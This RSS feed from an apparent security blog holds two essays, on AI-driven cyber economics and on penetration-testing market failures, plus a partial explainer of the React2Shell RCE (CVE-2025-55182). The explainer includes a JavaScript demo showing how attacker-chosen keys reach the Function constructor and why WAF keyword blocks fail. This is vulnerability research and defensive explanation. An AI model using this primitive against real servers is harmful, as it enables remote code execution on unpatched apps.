<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/">
    <channel>
        <title>Zeyu (Zayne) Zhang</title>
        <link>https://www.analogue.computer</link>
        <description>Where I write about software engineering, computer security, and everything in between.</description>
        <lastBuildDate>Thu, 16 Apr 2026 17:40:07 GMT</lastBuildDate>
        <docs>https://validator.w3.org/feed/docs/rss2.html</docs>
        <generator>https://github.com/jpmonette/feed</generator>
        <image>
            <title>Zeyu (Zayne) Zhang</title>
            <url>https://www.analogue.computer/favicon.ico</url>
            <link>https://www.analogue.computer</link>
        </image>
        <copyright>All rights reserved 2026</copyright>
        <item>
            <title><![CDATA[Cyber 2028]]></title>
            <link>https://www.analogue.computer/blog/cyber-2028</link>
            <guid>https://www.analogue.computer/blog/cyber-2028</guid>
            <pubDate>Sat, 11 Apr 2026 00:00:00 GMT</pubDate>
            <content:encoded><![CDATA[<p>Anthropic published its <a href="https://red.anthropic.com/2026/mythos-preview/">Mythos Preview cybersecurity evaluation</a> a few days ago, and a lot of people in cyber are spooked.</p>
<p>Not because it reads like a scenario piece such as <a href="https://ai-2027.com/">AI 2027</a>, but because the point is more immediate: if frontier models are already finding and exploiting serious zero-days across major software targets, cyber is changing right now.</p>
<p>This is a prediction essay about what happens now.</p>
<p>My basic claim is that as cyber moves from a labor-bound craft industry to a capital-bound one, the economics of offense, defense, and state power change with it.</p>
<h2>Cyber was a craft industry</h2>
<p>The parts of cyber that people usually mean when they say "advanced" have historically looked much closer to guild craftsmanship than industrial production. Good operators built intuition over years. They learned how to read weird codebases, infer system behavior from partial telemetry, chain small observations into a coherent exploit path, and adapt when the target did something unexpected.</p>
<p>That kind of work did not scale. If you wanted twice as much output, you usually needed roughly twice as many good people, and those people were hard to find, expensive to retain, and slow to train.</p>
<p>This labor bottleneck has protected the world more than most people realize.</p>
<p>A lot of current defensive assumptions only work because attackers have historically faced scarcity too. They could not deeply understand every target. They could not afford endless iteration against every exposed service. They could not customize every social engineering pretext. They could not continuously mutate malware or intrusion paths at machine speed while keeping quality high.</p>
<p>In other words, many systems are not secure in the strong sense. They are secure only because the attacker cannot afford to care enough.</p>
<p>Now, at the frontier, cyber power starts to concentrate among states and a small number of well-capitalized firms that can afford the full stack. At the same time, the marginal cost of many offensive actions collapses, which means the rest of the world gets flooded with cheap offensive capability. The frontier centralizes while the edge democratizes.</p>
<p>That is the story of Cyber 2028.</p>
<h2>The bottleneck moves up the stack</h2>
<p>Human expertise does not necessarily disappear, but more of it gets externalized into software and wrapped in systems that can be run <strong>repeatedly</strong>.</p>
<p>The useful unit is no longer just "a really smart hacker". It is something closer to an offensive production stack that can be parallelized:</p>
<ul>
<li>large models trained on code, infrastructure, and operational traces</li>
<li>agent loops that can do recon, hypothesis generation, tool use, validation, and adaptation</li>
<li>high-quality telemetry and vulnerability datasets</li>
<li>large-scale sandboxing and replay environments</li>
<li>delivery infrastructure, persistence infrastructure, and orchestration infrastructure</li>
</ul>
<p>None of this makes offense free. Frontier capability may become more expensive, not less. But it changes <em>where</em> the expense is. Instead of paying mainly for labor, you increasingly pay for the systems that make labor far more productive.</p>
<p>The "AI makes everyone a 10x hacker" framing is too shallow. The more important effect is that AI lets a small number of highly capable people scale their judgement far more efficiently than a large number of average people. It is easier to give one top hacker or engineer $100k in tokens and excellent tooling than to hire 100 more people and give each of them $1k in tokens. Offensive throughput starts to scale more like cloud spend than like headcount.</p>
<p>That matters because capital compounds differently from labor.</p>
<p>Actors with deep pockets can buy more parallelism, more data, more evals, more validation, and faster feedback loops. They can run thousands of exploit hypotheses where a normal team would run ten. They can test persistence mechanisms, phishing variants, privilege-escalation chains, and lateral movement plans continuously instead of occasionally. They can close the loop between failed operations and improved models much faster than anyone else.</p>
<p>So the decisive question becomes less "who has the best hackers?" and more "who can best industrialize them?"</p>
<h2>Why this does not just centralize everything</h2>
<p>At first glance, this sounds like a pure concentration story. Rich states and hyperscalers win. Everyone else loses. There is some truth to that. But it misses the more dangerous half of the picture.</p>
<p><strong>The fixed costs of frontier capability rise. The marginal cost of many attacks falls.</strong></p>
<p>The top end of cyber becomes more capital-intensive because the frontier stack is expensive. But once the stack exists, the cost of generating one more phishing lure, one more impersonation attempt, one more malware variant, one more target dossier, one more exploit hypothesis, or one more intrusion path can become extremely low.</p>
<p>A world where ten actors are terrifying is manageable. A world where ten million actors can each generate plausible offensive pressure cheaply is not.</p>
<p>So the paradox is this:</p>
<ul>
<li>strategic cyber concentrates</li>
<li>tactical cyber proliferates</li>
</ul>
<p>Major states and a few top-capitalized actors may dominate the frontier. But criminals, mercenaries, fraud shops, low-tier APTs, and ordinary nuisance actors all get dragged upward by the falling marginal cost of competence.</p>
<p>So Cyber 2028 is not a story about centralization or democratization. It is both at once.</p>
<h2>Strategic cyber starts to look different</h2>
<p>So does this mean cyber weapons become more like nuclear weapons? Probably not quite. Cyber remains noisier, leakier, harder to attribute, easier to reuse, and far more useful below the threshold of open conflict. Nuclear weapons are mostly valuable because they are not used. Cyber capability is often valuable precisely because it is used continuously, as long as it goes undetected or stays below the threshold that would start a war.</p>
<p>Still, at the frontier, cyber does begin to acquire some strategic-weapons-like features.</p>
<p>First, top-end capability becomes concentrated among a relatively small number of actors who can afford the full stack.</p>
<p>Second, many capabilities will be held in reserve rather than burned immediately, such as zero-days and backdoors that provide latent access into critical infrastructure, logistics systems, telecoms, satellite links, industrial control environments, or key software supply chains.</p>
<p>Third, deterrence becomes even murkier because states can signal capability without disclosing specifics, while the real value sits in uncertainty: what access has already been established, what can be turned on in a crisis, and what dependencies are already compromised.</p>
<p>The result is not really a one-to-one replacement for nuclear deterrence. It is something stranger: continuous pre-battlefield shaping under partial visibility.</p>
<p>As frontier cyber becomes more nuclear-like, something like mutually assured destruction restrains the major powers from using their best capabilities against each other, which leaves smaller players such as rogue actors and criminals as the day-to-day threat.</p>
<p>By 2028, I expect the line between "crime", "espionage", "influence", and "preparation of the battlefield" to blur further. The same access pathway can support all four depending on when it is used and by whom.</p>
<h3>1. The mid-market company that can no longer hide</h3>
<p>A mid-sized SaaS company in 2020 could survive partly by being uninteresting. It might not have world-class security, but it also was not worth an advanced attacker burning much time on. The long tail of mediocre defenses benefited from attacker scarcity.</p>
<p>By 2028, that shelter collapses.</p>
<p>The company is now probed constantly by agentic offensive systems that can read public documentation, infer likely cloud architecture from job listings and stack traces, adapt phishing lures to individual employees, and continuously generate new intrusion hypotheses. Nobody on the attacker side needs to think this company is special. The cost of caring has collapsed.</p>
<p>So the security posture of the median firm starts to depend less on whether it is important, and more on whether it can automate defense faster than cheap attackers can automate offense. A lot of firms discover, too late, that "not being a target" was never a strategy. It was a subsidy.</p>
<h3>2. The criminal group with industrial-scale personalization</h3>
<p>Today, the average scam or intrusion campaign is still constrained by quality. Personalization exists, but it is often shallow. Operators make tradeoffs between scale and credibility.</p>
<p>By 2028, the better criminal groups may not have to choose as often.</p>
<p>A relatively small organization will be able to run campaigns with dossiers built from breached data, public social graphs, leaked inboxes, corporate org charts, conference talks, internal writing style, and prior communication patterns. Pretexts will be generated, tested, and adapted automatically. Voice and video impersonation will not be perfect, but they will not need to be. Most fraud does not require perfection. It requires one tired employee at the wrong moment.</p>
<p>This does not mean every gang becomes elite. It means elite tradecraft fragments into reusable infrastructure. Once enough of the offensive stack gets productized, the median criminal operator gets much better without understanding much more.</p>
<h3>3. The state that never quite attacks</h3>
<p>Now zoom out to major-power competition.</p>
<p>A capable state in 2028 may spend years building, validating, and quietly maintaining access into shipping, energy, telecoms, cloud control planes, and defense-adjacent supply chains, not because it intends to trigger immediate disruption, but because optionality itself becomes strategic.</p>
<p>That access sits there in peacetime, half-espionage and half-contingency plan.</p>
<p>Cyber at the frontier means that capable nation states have pre-positioned leverage inside the systems that other nation states depend on. If a war breaks out, this leverage allows them to impose devastation on multiple enemy states in milliseconds and without firing a shot. So no war happens, only because starting one would mean the enemy has already won.</p>
<h2>The defense side also becomes capital-bound</h2>
<p>There is an obvious response to all this: fine, defense gets cheaper too.</p>
<p>Defenders will definitely get better tooling, better anomaly detection, better code review, faster triage, stronger identity enforcement, automated remediation, and much richer feedback loops between incidents and prevention. The best organizations will look dramatically more resilient than they do today.</p>
<p>But this is precisely the problem. Resilience starts to look like a scale advantage.</p>
<p>Organizations with enough money, talent density, and telemetry can build defensible environments. Everyone else gets the worse version of this future.</p>
<p>The frontier firms and the strongest states may become more defensible than ever. The median school, hospital, logistics provider, local government, vendor, or SMB may become relatively less defensible, not because defenders there are stupid, but because they cannot afford the fixed costs of industrialized defense.</p>
<p>That has policy consequences because modern societies are only as strong as their softest critical dependencies.</p>
<h2>What follows from this?</h2>
<p>If this model is even directionally right, then a lot of current cyber policy is aimed at the wrong level of abstraction.</p>
<p>The problem is not simply "more cyber attacks". The problem is a structural shift in the economics of capability. Policy that assumes cyber remains bottlenecked mainly by elite labor will age badly.</p>
<p>Some implications seem straightforward.</p>
<p>First, we should expect security capacity to become more uneven, and plan around that explicitly. It is not enough to harden the top 1% of organizations if the supply chain, local government, healthcare, and industrial base remain easy to pressure.</p>
<p>Second, resilience matters more than perfect prevention. In a world of abundant low-cost offense, the decisive defensive advantage is often the ability to recover quickly, revoke trust quickly, rotate secrets quickly, and continue operating under partial compromise.</p>
<p>Finally, governments should be careful not to overlearn the concentration half of the story. Yes, frontier cyber may centralize among major powers. But the broader social harm may come less from exquisite state capability than from the background radiation of cheap offense everywhere else.</p>
<p>That means public policy cannot focus only on the most advanced adversaries. It also has to reduce the everyday attackability of ordinary institutions.</p>
<h2>The new cyber order</h2>
<p>The point is simple:</p>
<p>Cyber stops being a craft industry and becomes an industrial one.</p>
<p>That does not make it less human. It changes where human expertise sits in the stack. Elite labor gets embedded in capital. A small number of strong actors build offensive and defensive systems that compound. Everyone else deals with the outputs.</p>
<p>This produces a bifurcated world.</p>
<p>At the top, cyber power becomes more strategic, more concentrated, and more entangled with state competition.</p>
<p>Everywhere else, offensive capability becomes cheaper, more personalized, more persistent, and much harder to ignore.</p>
<p>Cyber 2028 is not just "more hacks". It is a shift in the economics of capability.</p>
<p>The world does not run out of smart defenders. It runs out of organizations that can afford the capital stack required to let those defenders keep up.</p>]]></content:encoded>
            <author>ping@analogue.computer (Zeyu (Zayne) Zhang)</author>
        </item>
        <item>
            <title><![CDATA[The economic failures of penetration testing]]></title>
            <link>https://www.analogue.computer/blog/security-economics</link>
            <guid>https://www.analogue.computer/blog/security-economics</guid>
            <pubDate>Fri, 09 Jan 2026 00:00:00 GMT</pubDate>
            <content:encoded><![CDATA[<p>Offensive security seems to be getting its time in the sun again with the rise of AI-powered tools that promise
fully autonomous penetration testing. But is it really all that different from the old days?</p>
<p>The persistent failure of the penetration testing market is often framed as a technical problem:
not enough talent, insufficient automation, immature tooling, or attackers moving faster than defenders.
This framing is comforting because it implies that incremental technical progress will eventually close the gap.
In reality, the core problem is economic. It systematically rewards the appearance of security over the reduction of risk,
and it does so through a predictable set of incentive failures that any A-Level Economics student can explain.</p>
<p>The core problem: it is not a market for outcomes, it is a market for signals.</p>
<h2>Information Asymmetry and Adverse Selection</h2>
<p>Akerlof's <a href="https://en.wikipedia.org/wiki/Market_for_lemons">market for lemons</a> is a classic example of how information asymmetry can
lead to market failure. In the used car market, the seller knows more about the quality of the car than the buyer. It is impossible
for the buyer to know the true quality of the car before buying it, so they price for the expected (average) quality.
This leads to the high-quality sellers leaving the market because the average price falls below their cost of production,
leading the average quality of the market to fall further.</p>
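<p>The unravelling can be sketched numerically. This is a toy model, not Akerlof's formal one: the seller costs are made-up numbers, <code>unravel</code> is a hypothetical helper, and it assumes buyers pay exactly the average quality of whatever is still on offer while any seller whose cost exceeds that price leaves.</p>

```javascript
// Toy adverse-selection loop. All numbers are illustrative assumptions.
// Each seller's cost equals the true quality of what they sell.
function unravel(costs) {
  let remaining = [...costs];
  const history = [];
  while (remaining.length !== 0) {
    // Buyers cannot observe quality, so they offer the average.
    const price = remaining.reduce((sum, c) => sum + c, 0) / remaining.length;
    history.push({ sellers: remaining.length, price });
    // Sellers whose cost is above the offered price exit the market.
    const staying = remaining.filter((c) => price >= c);
    if (staying.length === remaining.length) break; // nobody left: stable
    remaining = staying;
  }
  return { remaining, history };
}

const result = unravel([2000, 4000, 6000, 8000, 10000]);
console.log(result.history);   // price falls 6000, 4000, 3000, 2000
console.log(result.remaining); // only the lowest-quality seller survives
```

<p>Under these assumptions the offered price drops each round until only the cheapest, lowest-quality seller is left, which is the same dynamic the next paragraph describes for pentesting providers.</p>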
<p>In a similar vein, the penetration testing market adversely selects against the best pentesters, instead selecting for proxy
signals: certifications, report length, vulnerability counts, or compliance acceptance.
None of these are tightly correlated with real attacker cost or the likelihood of a breach.
Again, there are tons of firms with CREST certifications, so the buyer prices for the average.
High-quality providers, whose work is slower, more expensive, and harder to explain in a procurement meeting, are crowded out.
Lower-quality providers, who can produce predictable findings cheaply and repeatedly, start to dominate the market.</p>
<p>Over time, this drives a race to the bottom. The equilibrium product becomes the "acceptable" pentest:
one that produces familiar, low-hanging fruit, fits procurement expectations, and minimizes organizational disruption,
regardless of whether it meaningfully models attacker sophistication.</p>
<h2>Moral Hazards and Perverse Feedback Loops</h2>
<p>Moral hazards occur when one party to a transaction has an incentive to take actions that are not in the best interest of the other party.
In the pentesting market, the pentesting firm has an incentive to find issues, not to actually reduce risk.
There is no upside for identifying deep systemic flaws that are politically difficult or expensive to fix.</p>
<p>Security teams, meanwhile, are often evaluated on audit success rather than security posture. Their rational incentive is to
commission work that passes compliance checks with minimal internal friction. A pentest that uncovers uncomfortable architectural
weaknesses creates political cost without guaranteeing budget or remediation authority.
A shallow pentest that confirms existing narratives is safer.</p>
<p>This moral hazard produces predictable behavior. Pentests focus on low-hanging fruit.
Reports emphasize volume over depth. The same vulnerability classes reappear annually, not because they are hard to fix,
but because no one is economically rewarded for ensuring that they are fixed.</p>
<p>Modern application-security tooling exacerbates the problem. Better tools increase visibility into real risk,
but visibility generates work. Findings require triage, prioritization, fixes, regressions, and cross-team coordination.
For engineering organizations already under delivery pressure, security improvements often appear as a pure tax.</p>
<p>From a narrow organizational perspective, it is rational to underinvest in tools or tests that surface actionable
truth without providing remediation capacity. A weak pentest that produces a small, predictable list of issues is
less disruptive than a strong system that reveals hundreds of real weaknesses. In this sense, insecurity becomes
a form of organizational equilibrium. Unless the tool makes <strong>remediation</strong> low-friction, it will not be easily adopted.</p>
<h2>The Compliance Demand Proxy</h2>
<p>Compliance frameworks like SOC 2 and ISO 27001 further distort incentives by acting as demand proxies for security.
Pentests are purchased not to actually find meaningful security issues, but because they are required by an external checklist.
This moves the goalpost away from realistic attacker behaviour and towards helping the organisation pass the audit.</p>
<p>Fixed-scope, time-boxed engagements are imposed regardless of system complexity or change velocity.
Success is defined by the presence of a report, not by the absence of exploitable paths.
In this environment, pentesting becomes performative: existing to satisfy third parties, not to inform internal decision-making.</p>
<p>This segment of demand selects almost entirely for security theatre.</p>
<h2>Pricing Failures and the Race to the Bottom</h2>
<p>The dominant pricing models in pentesting — flat fees and hourly rates — are poorly aligned with outcomes.
They decouple compensation from exploit difficulty, business impact, or remediation success.
Competitive pressure pushes firms to reduce costs through junior staffing, templated methodologies, and superficial checklist-based testing.</p>
<p>Because quality remains largely unobservable, price becomes the primary axis of competition.
The market clears not at the price of risk reduction, but at the price of plausible deniability.</p>
<h2>Positive Externalities</h2>
<p>Markets with positive externalities tend to under-consume because the second-order effects on the ecosystem are not directly felt by the buyer,
so they are not priced in.</p>
<p>Security improvements generate positive externalities. A company that fixes systemic vulnerabilities reduces risk not only for itself, but for customers,
partners, and the broader ecosystem. However, the cost of remediation is borne immediately and internally, while much of the benefit is diffused over time and external.</p>
<p>This is why companies often deploy cheap fixes that don't remediate fundamental architectural weaknesses, and why the same bug fixed after
a previous pentest tends to resurface in a slightly different form later.</p>
<h2>Re-aligning Incentives</h2>
<p>The failures described above persist not because organizations misunderstand security, but because the current market
clears at an equilibrium optimized for compliance, cost containment, and plausible deniability.
Any attempt to "fix" the penetration-testing market must therefore focus on changing incentives rather than improving technical capabilities in isolation.</p>
<p>Looking ahead into the next 5 years, how do we improve the market? There is no perfect answer, but some things that come to mind:</p>
<ol>
<li>
<p><strong>Re-internalise external responsibilities</strong>: moving from one-off pentests that hand off all long-term responsibility to the buyer
to a continuous approach that expects long-term, consistent outcomes from the seller. Security products should be designed
to stand the test of time, and be viewed as a way to reduce responsibility for the security team.</p>
</li>
<li>
<p><strong>Align pricing with outcomes</strong>: selling actionable outcomes, which include <em>both</em> discovery and triaging/remediation,
reduces noise and prevents information that cannot be acted on from being marketed as value. Security tooling that creates more
work for engineering teams with no corresponding budget or authority is not sustainable. Tools should make remediation low-friction,
and organisations should view these tools as reducing work, not increasing it.</p>
</li>
<li>
<p><strong>Reframe compliance as a lagging indicator</strong>: rather than being a primary driver of demand,
compliance artifacts should be seen as byproducts of a secure system (instead of its objective!). This is a hard one
because it requires shifting of internal metrics.</p>
</li>
</ol>
<p>Attempts to improve security by increasing technical capability alone will fail. More accurate testing, better tools,
or deeper analysis raise the cost of information without changing who bears responsibility for acting on it.
The result is a market that systematically undervalues high-signal work and selects against those who produce it.</p>
<p>In this sense, the failures of the pentesting market are not unique. They mirror the broader economics of prevention:
costs are immediate, benefits are invisible, and success is defined by the absence of events that cannot be proven to have been avoided.
Markets built on such foundations require deliberate incentive design to function at all.</p>
<p>Absent that design, penetration testing will remain what it largely is today: not a mechanism for reducing risk,
but a ritual that allows organizations to proceed as if they had.</p>]]></content:encoded>
            <author>ping@analogue.computer (Zeyu (Zayne) Zhang)</author>
        </item>
        <item>
            <title><![CDATA[Making sense of React4Shell / React2Shell (CVE-2025-55182)]]></title>
            <link>https://www.analogue.computer/blog/react4shell</link>
            <guid>https://www.analogue.computer/blog/react4shell</guid>
            <pubDate>Sat, 06 Dec 2025 00:00:00 GMT</pubDate>
            <content:encoded><![CDATA[<p>It seems like security folks never catch a break in December. 3 days ago, a critical remote code execution vulnerability in the React Server Components Flight Protocol was discovered and patched.</p>
<p>This is still an ongoing story, but I'll try to break through the noise and share the technical details of the vulnerability, my thoughts on it, and how <a href="https://www.hacktron.ai">Hacktron</a> responded by participating actively in
the community effort to remediate the vulnerability.</p>
<h2>TL;DR</h2>
<ul>
<li><a href="https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components">CVE-2025-55182</a> is a critical unauthenticated RCE vulnerability in the React Server Components (RSC) "Flight" protocol.</li>
<li>Default configurations, such as a Next.js app created with <code>create-next-app@16.0.6</code> and built for production, are vulnerable with no code changes by the developer.</li>
<li>Exploitation requires only a single, unauthenticated HTTP request.</li>
<li>Public RCE exploits are available, and the vulnerability is being actively exploited in the wild.</li>
<li>Cloudflare, Vercel, and others have implemented WAF mitigations to block exploits. Vercel has introduced a <a href="https://hackerone.com/vercel_platform_protection">public bug bounty</a> for WAF bypasses.</li>
<li>Hacktron's research team has identified and reported 3 WAF bypasses to Vercel, and has been working closely with relevant security teams to mitigate the vulnerability.</li>
</ul>
<figure class="mx-auto"><img alt="PoC Exploit" loading="lazy" width="1711" height="715" decoding="async" data-nimg="1" style="color:transparent" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2F0.5a712e5f.png&amp;w=1920&amp;q=75 1x, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2F0.5a712e5f.png&amp;w=3840&amp;q=75 2x" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2F0.5a712e5f.png&amp;w=3840&amp;q=75"><figcaption class="text-center">PoC Exploit</figcaption></figure>
<p><strong>Update:</strong> Some news sources have been calling this a prototype pollution vulnerability. This is incorrect. While public PoCs have used <code>__proto__</code>, this is only used to
get the <code>Function</code> constructor. The actual vulnerability is that we can access JavaScript properties like <code>constructor</code>, even though these belong to the <code>Object</code> prototype and are not keys of
the object itself.</p>
<p>It is true that the exploit relies on:</p>
<ol>
<li>accessing the <code>constructor</code> property of the <code>Object</code> prototype</li>
<li>overwriting a bunch of object properties</li>
</ol>
<p>But this is not "prototype pollution" as it is strictly defined in security. Prototype pollution means injecting malicious properties into the <em>global</em> <code>Object.prototype</code>, and being able to poison any JS object in the runtime. This would require accessing properties like <code>__proto__</code> or <code>prototype</code>.</p>
<p>Here, the minimum viable exploit does not require the <code>__proto__</code> or <code>prototype</code> property within the payload, so simply blacklisting these in a WAF will NOT work.</p>
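<p>The distinction can be shown in a few lines of plain JavaScript. This is a simplified illustration and not the React Flight code path: <code>resolvePath</code> and <code>resolveOwnPath</code> are hypothetical helpers, and <code>model</code> stands in for any object whose keys an attacker gets to choose.</p>

```javascript
// Simplified illustration only: NOT the actual React Flight implementation.
// resolvePath is a hypothetical helper that walks attacker-supplied keys.
function resolvePath(root, keys) {
  let value = root;
  for (const key of keys) {
    value = value[key]; // a plain lookup also follows the prototype chain
  }
  return value;
}

// Hardened variant (an assumption about one possible fix, not the real patch):
// only follow keys that are own properties of the current value.
function resolveOwnPath(root, keys) {
  let value = root;
  for (const key of keys) {
    if (value === null || value === undefined) return undefined;
    if (!Object.hasOwn(Object(value), key)) return undefined;
    value = value[key];
  }
  return value;
}

const model = { title: "hello" };

// Neither "__proto__" nor "prototype" appears in the path,
// yet the lookup still reaches the Function constructor.
const reached = resolvePath(model, ["constructor", "constructor"]);
const reachedIsFunction = reached === Function;

// Nothing was written to the global Object.prototype along the way.
const pollutedKeys = Object.keys(Object.prototype);

// The own-property check stops the same path at the first inherited key.
const blocked = resolveOwnPath(model, ["constructor", "constructor"]);
const allowed = resolveOwnPath(model, ["title"]);

console.log(reachedIsFunction, pollutedKeys.length, blocked, allowed);
```

<p>The first lookup only reads inherited properties, which is why a WAF rule that searches for <code>__proto__</code> or <code>prototype</code> never sees anything to match.</p>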
<h2>Background</h2>
<p>To understand this vulnerability, we first need some context on React Server Components (RSC) and the Flight protocol.</p>
<h3>Server-Side Rendering and Server Components</h3>
<p>Prior to SSR, React applications used a fully client-side approach to rendering. The user would receive an HTML file that looked like this:</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="html" data-theme="github-dark-dimmed"><code data-language="html" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#ADBAC7">&lt;!</span><span style="color:#8DDB8C">DOCTYPE</span><span style="color:#6CB6FF"> html</span><span style="color:#ADBAC7">&gt;</span></span>
<span data-line=""><span style="color:#ADBAC7">&lt;</span><span style="color:#8DDB8C">html</span><span style="color:#ADBAC7">&gt;</span></span>
<span data-line=""><span style="color:#ADBAC7">  &lt;</span><span style="color:#8DDB8C">body</span><span style="color:#ADBAC7">&gt;</span></span>
<span data-line=""><span style="color:#ADBAC7">    &lt;</span><span style="color:#8DDB8C">div</span><span style="color:#6CB6FF"> id</span><span style="color:#ADBAC7">=</span><span style="color:#96D0FF">"root"</span><span style="color:#ADBAC7">&gt;&lt;/</span><span style="color:#8DDB8C">div</span><span style="color:#ADBAC7">&gt;</span></span>
<span data-line=""><span style="color:#ADBAC7">    &lt;</span><span style="color:#8DDB8C">script</span><span style="color:#6CB6FF"> src</span><span style="color:#ADBAC7">=</span><span style="color:#96D0FF">"/static/js/bundle.js"</span><span style="color:#ADBAC7">&gt;&lt;/</span><span style="color:#8DDB8C">script</span><span style="color:#ADBAC7">&gt;</span></span>
<span data-line=""><span style="color:#ADBAC7">  &lt;/</span><span style="color:#8DDB8C">body</span><span style="color:#ADBAC7">&gt;</span></span>
<span data-line=""><span style="color:#ADBAC7">&lt;/</span><span style="color:#8DDB8C">html</span><span style="color:#ADBAC7">&gt;</span></span></code></pre></figure>
<p>That <code>bundle.js</code> script includes everything needed to mount and run the application. Once this script (which also includes React and other third-party dependencies) has been downloaded,
React can then render the entire application, placing it in the <code>&lt;div id="root"&gt;</code> element.</p>
<p>The problem is that this leads to a lot of latency for the user, as the entire application needs to be downloaded and parsed before it can be rendered.</p>
<p>To improve this experience, React introduced Server-Side Rendering (SSR), where the HTML is generated on the server and sent to the client.
Of course, we still need interactivity and event handlers, so we still include a <code>&lt;script&gt;</code> tag to "hydrate" the application.</p>
<p>Dan Abramov, one of React's core contributors, describes this process as follows:</p>
<blockquote>
<p>Hydration is like watering the “dry” HTML with the “water” of interactivity and event handlers.</p>
</blockquote>
<p>Nowadays, React components are split into two categories: Server Components and Client Components. By default, all components are Server Components, but we can mark a component as a Client Component by using the <code>use client</code> directive.</p>
<h3>The Flight Protocol</h3>
<p>In order to support executing function components on the server, and then building the DOM from the results, React needed a way to serialize
the React component tree into a format that can be sent to the client. This is where the Flight protocol comes in.</p>
<p>This is a very powerful and complete protocol that, for example, supports sending <code>Promise</code>s. This allows the client to render the rest of the application
as soon as it receives the initial HTML from the server, while waiting for some asynchronous operations such as database fetches to be completed.</p>
<p>For example, this React component:</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="javascript" data-theme="github-dark-dimmed"><code data-language="javascript" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#F47067">export</span><span style="color:#F47067"> default</span><span style="color:#F47067"> function</span><span style="color:#DCBDFB"> Home</span><span style="color:#F69D50">() </span><span style="color:#ADBAC7">{</span></span>
<span data-line=""><span style="color:#F47067">  return</span><span style="color:#ADBAC7"> (</span></span>
<span data-line=""><span style="color:#ADBAC7">    &lt;</span><span style="color:#8DDB8C">main</span><span style="color:#ADBAC7">&gt;</span></span>
<span data-line=""><span style="color:#ADBAC7">      &lt;</span><span style="color:#8DDB8C">h1</span><span style="color:#ADBAC7">&gt;Hello world!&lt;/</span><span style="color:#8DDB8C">h1</span><span style="color:#ADBAC7">&gt;</span></span>
<span data-line=""><span style="color:#ADBAC7">    &lt;/</span><span style="color:#8DDB8C">main</span><span style="color:#ADBAC7">&gt;</span></span>
<span data-line=""><span style="color:#ADBAC7">  );</span></span>
<span data-line=""><span style="color:#ADBAC7">}</span></span></code></pre></figure>
<p>would be serialized to the following:</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="javascript" data-theme="github-dark-dimmed"><code data-language="javascript" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#96D0FF">"[</span><span style="color:#F47067">\"</span><span style="color:#96D0FF">$</span><span style="color:#F47067">\"</span><span style="color:#96D0FF">,</span><span style="color:#F47067">\"</span><span style="color:#96D0FF">main</span><span style="color:#F47067">\"</span><span style="color:#96D0FF">,null,{</span><span style="color:#F47067">\"</span><span style="color:#96D0FF">children</span><span style="color:#F47067">\"</span><span style="color:#96D0FF">:[</span><span style="color:#F47067">\"</span><span style="color:#96D0FF">$</span><span style="color:#F47067">\"</span><span style="color:#96D0FF">,</span><span style="color:#F47067">\"</span><span style="color:#96D0FF">h1</span><span style="color:#F47067">\"</span><span style="color:#96D0FF">,null,{</span><span style="color:#F47067">\"</span><span style="color:#96D0FF">children</span><span style="color:#F47067">\"</span><span style="color:#96D0FF">:</span><span style="color:#F47067">\"</span><span style="color:#96D0FF">Hello world!</span><span style="color:#F47067">\"</span><span style="color:#96D0FF">},</span><span style="color:#F47067">\"</span><span style="color:#96D0FF">$c</span><span style="color:#F47067">\"</span><span style="color:#96D0FF">]},</span><span style="color:#F47067">\"</span><span style="color:#96D0FF">$c</span><span style="color:#F47067">\"</span><span style="color:#96D0FF">]"</span></span></code></pre></figure>
<p>This is what's contained in the <code>&lt;script&gt;</code> tag in the HTML response.</p>
<figure class="mx-auto"><img alt="HTML response" loading="lazy" width="1714" height="806" decoding="async" data-nimg="1" style="color:transparent" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2F1.8e2b3f85.png&amp;w=1920&amp;q=75 1x, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2F1.8e2b3f85.png&amp;w=3840&amp;q=75 2x" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2F1.8e2b3f85.png&amp;w=3840&amp;q=75"><figcaption class="text-center"></figcaption></figure>
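<p>To get a feel for the shape of that payload, here is a small sketch that parses the serialized string above and prints it as an outline. It assumes each element is an array of the form <code>["$", type, key, props]</code>, which is read off this one example and is not a full description of the format. <code>isElementTuple</code> and <code>describe</code> are hypothetical helper names.</p>

```javascript
// The serialized string from the example above.
const serialized =
  '["$","main",null,{"children":["$","h1",null,{"children":"Hello world!"},"$c"]},"$c"]';

// Assumption: an element is an array whose first item is "$", followed by
// the element type, a key, and a props object.
function isElementTuple(node) {
  return Array.isArray(node) ? node[0] === "$" : false;
}

// Hypothetical helper: turn the tuple tree into an indented outline.
function describe(node, depth = 0) {
  const indent = "  ".repeat(depth);
  if (!isElementTuple(node)) {
    return [indent + JSON.stringify(node)];
  }
  const [, type, , props] = node;
  const lines = [indent + type];
  const children = props ? props.children : undefined;
  if (children !== undefined) {
    lines.push(...describe(children, depth + 1));
  }
  return lines;
}

const outline = describe(JSON.parse(serialized));
console.log(outline.join("\n"));
```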
<h3>Server Functions</h3>
<p>In React 19, a new feature called "Server Functions" was introduced. This essentially allows RPC calls to be made from the client using the same
Flight machinery. For this, the <code>use server</code> directive was added to mark a function as a server function.</p>
<p>For instance, this form submission would call the <code>myServerAction</code> function on the server:</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="javascript" data-theme="github-dark-dimmed"><code data-language="javascript" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#ADBAC7">&lt;</span><span style="color:#8DDB8C">form</span><span style="color:#6CB6FF"> action</span><span style="color:#F47067">={</span><span style="color:#ADBAC7">myServerAction</span><span style="color:#F47067">}</span><span style="color:#ADBAC7">&gt;</span></span>
